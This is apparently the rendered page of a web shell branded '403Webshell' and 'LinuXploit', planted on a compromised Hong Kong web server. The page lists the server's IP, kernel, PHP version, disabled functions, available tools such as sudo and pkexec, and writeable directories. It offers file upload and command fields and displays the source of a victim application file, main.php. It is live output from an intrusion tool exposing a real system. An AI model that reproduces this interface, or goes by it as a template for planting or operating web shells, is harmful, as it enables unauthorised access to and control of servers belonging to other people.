403Webshell
Server IP : 210.245.233.93  /  Your IP : 216.73.216.226
Web Server : Apache/2.2.15 (CentOS)
System : Linux webserver2.onesolution.com.hk 2.6.32-754.35.1.el6.x86_64 #1 SMP Sat Nov 7 12:42:14 UTC 2020 x86_64
User : apache ( 48)
PHP Version : 5.3.3
Disable Function : exec, shell_exec, system, passthru, popen, proc_open, pcntl_exec
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/(Del)pathways.org.hk/MIS_bk/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/(Del)pathways.org.hk/MIS_bk/main.php
<?php
require_once(__DIR__ . '/checkuser.php');
?><!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
	
	<?php require(__DIR__ . '/inc/_head_meta.php'); ?>
	
	<?php require(__DIR__ . '/inc/_head_css.php'); ?>
	
	<?php require(__DIR__ . '/inc/_head_script.php'); ?>
	
</head>
<body>
	
	<?php require(__DIR__ . '/inc/_navbar.php'); ?>
	
	<div class="text-right">
		<ul class="breadcrumb">
			<li class="active">Support Information</li>
		</ul>
	</div>
	
	<div class="container-fluid pathways-container">
		
		<?php if (isset($message) && !empty($message)): ?>
		<div class="alert alert-info">
			<button type="button" class="close" data-dismiss="alert">&times;</button>
			<h5 class="alert-heading">Note:</h5>
			<p><?=$message?></p>
		</div>
		<?php endif; ?>

		<div class="container" style="padding-top:30px">
			<div class="row-fluid">
				<div class="span12">
					<div class="hero-unit">
						<h3>Welcome to Pathways MIS</h3>
						<p>
							System support infomation:<br />
							Office Hours: 9:00 A.M. to 6:00 P.M. (Mon - Fri)<br />
							Tel: (852) 3189 9000<br />
							Fax: (852) 3189 9099 <br />
							<!-- E-mail: <a href="mailto:info@onecms.hk">info@onecms.hk</a> -->
						</p>
					</div>
				</div><!--/span-->
			</div><!--/row-->
		</div> <!-- /container -->
		
		<?php require(__DIR__ . '/inc/_footer.php'); ?>

	</div> <!-- /container -->
</body>
</html>

Youez - 2016 - github.com/yon3zu
LinuXploit